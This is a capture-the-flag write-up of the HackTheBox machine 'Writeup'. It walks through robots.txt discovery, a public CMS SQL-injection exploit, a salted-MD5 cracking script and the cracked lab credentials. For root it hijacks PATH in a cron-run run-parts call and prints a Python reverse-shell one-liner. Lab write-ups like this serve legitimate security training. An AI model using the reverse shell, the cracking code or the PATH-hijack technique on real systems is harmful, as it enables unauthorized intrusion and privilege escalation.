HackTheBox Writeups

Writeups for all the HTB boxes I have solved

View on GitHub



Author: jkr

Machine IP:

DATE : 9/06/2019



We can see that robots.txt is available so let’s see what we can find in it.

robots.txt gave us the /writeup/ URL and visiting there we get the directory with writeups to old machines.


Let’s run gobuster and see if we can find anything else but gobuster didn’t worked so I tried dirsearch that also didn’t worked. I was confused why they weren’t working. Then after visiting the website page I realized why.

So I decided to crawl the website with burp’s spider.

Just intercept the requests

and then send it to spider. In the site-map you’ll find all the newly discovered content.

As we can see that other than robots.txt there’s a /writeup/ which we already found, meaning there’s nothing else. This could mean we need to focus on the /writeups/ page.

This is what the page looked like and it had few writeups for old retired machines.

After spending some time looking around I noticed one thing. There’s CMSSESSID in those /writeup/ links.

This mean they are using CMS in the back so I decided to search for CMS exploit and found this exploit

Pwn User

I ran this exploit

$ python2 exploit.py -u

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

Then I separated the crack password function and changed it a bit to crack the password.

import hashlib

PASSWORD = "62def4866937f08cc13bab43bb14e6f7"
WORDLIST = "rockyou.lst"
SALT = "5a599ef579066807"

def crack_password():
    output = ""
    with open(WORDLIST) as f:
        for line in f.readlines():
            line = line.replace("\n", "")
            if hashlib.md5(str(SALT) + line).hexdigest() == PASSWORD:
                output += "\n[+] Password cracked: " + line
    return output

if __name__ == "__main__":

and it cracked the password.

So now we have the credentials jkr: raykayjay9

I was able to login into jkr account via SSH.

Then I got the user

pwn root

I downloaded the enumeration script and ran it but couldn’t find anything interesting. I tried looking around into different things like sudo -l or any cronjobs but I couldn’t find anything.

After reading some comments on the forum discussion I found out that I need to keep an eye on the process running. So I downloaded the pspy and ran it.

Most of the time I was getting the SSH login.

But then after sometime I got something different

Now we can see that there’s something running in background called run-parts. I found out that it’s a cronjob associated with all users.

Since this binary doesn’t have the full path maybe we can use this for our privilege escalation.

Here’s the interesting part. A cronjob is triggering

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

and we can see that in this command the run-parts is without the complete path. And right before that there’s a PATH variable defined.

So basically while running the run-parts system will search it in the given PATHS. We can take advantage of this by simply making a executable file with a reverse shell in it. If it work it will trigger a Root reverse shell.

I checked and there wasn’t any nc on the system so I used the python’s reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

We have write permission in /usr/local/sbin and /usr/local/bin so we can make file in any of those.

I really enjoyed this machine even though the SQLi part on free network was really a pain but I am happy that I was able to complete this.

Thanks to @jkr for making this machine.

Thanks for reading, Feedback is always appreciated

Follow me @0xmzfr for more “Writeups”.